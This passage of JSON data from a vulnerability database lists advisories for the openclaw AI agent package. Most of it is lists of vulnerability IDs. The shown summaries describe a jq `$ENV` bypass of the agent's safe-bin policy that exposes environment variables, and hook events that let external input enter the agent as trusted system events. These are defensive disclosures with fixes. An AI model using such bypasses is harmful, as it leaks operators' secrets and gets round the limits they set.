ility":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2"}],"aliases":["GHSA-2858-xg23-26fp"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zda4-uuw4-fkhp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90951?format=json","vulnerability_id":"VCID-zf3q-78js-k7ce","summary":"OpenClaw safeBins jq `$ENV` filter bypass allows environment variable disclosure\n## Summary\n\nThe jq safe-bin policy blocked explicit `env` usage but still allowed jq programs that accessed environment data through `$ENV`.\n\n## Impact\n\nAn operator-approved safe-bin jq command could disclose environment variables that the safe-bin policy was supposed to keep out of scope.\n\n## Affected Component\n\n`src/infra/exec-safe-bin-semantics.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `78e2f3d66d` (`Exec: tighten jq safe-bin env checks`).\n\nThanks @nicky-cc  of Tencent zhuque Lab ([https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard)) for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/78e2f3d66d74e5c7e6f45c54162e63986e39771b","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/78e2f3d66d74e5c7e6f45c54162e63986e39771b"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jccr-rrw2-vc8h","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jccr-rrw2-vc8h"},{"reference_url":"https://github.com/advisories/GHSA-jccr-rrw2-vc8h","reference_id":"GHSA-jccr-rrw2-vc8h","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jccr-rrw2-vc8h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-jccr-rrw2-vc8h"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zf3q-78js-k7ce"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89446?format=json","vulnerability_id":"VCID-zg68-u5b5-vkft","summary":"OpenClaw: Agent hook events could enqueue trusted system events from unsanitized external input\n## Summary\n\nAgent hook events could enqueue trusted system events from unsanitized external input.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nAgent hook dispatch could turn externally supplied hook metadata into trusted system events, allowing untrusted input to enter the agent as higher-trust context.\n\n## Technical Details\n\nThe fix sanitizes hook names and marks agent hook system events as untrusted before enqueueing them.\n\n## Fix\n\nThe issue was fixed in #64372. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `e3a845bde5b54f4f1e742d0a51ba9860f9619b29`\n- PR: #64372\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this 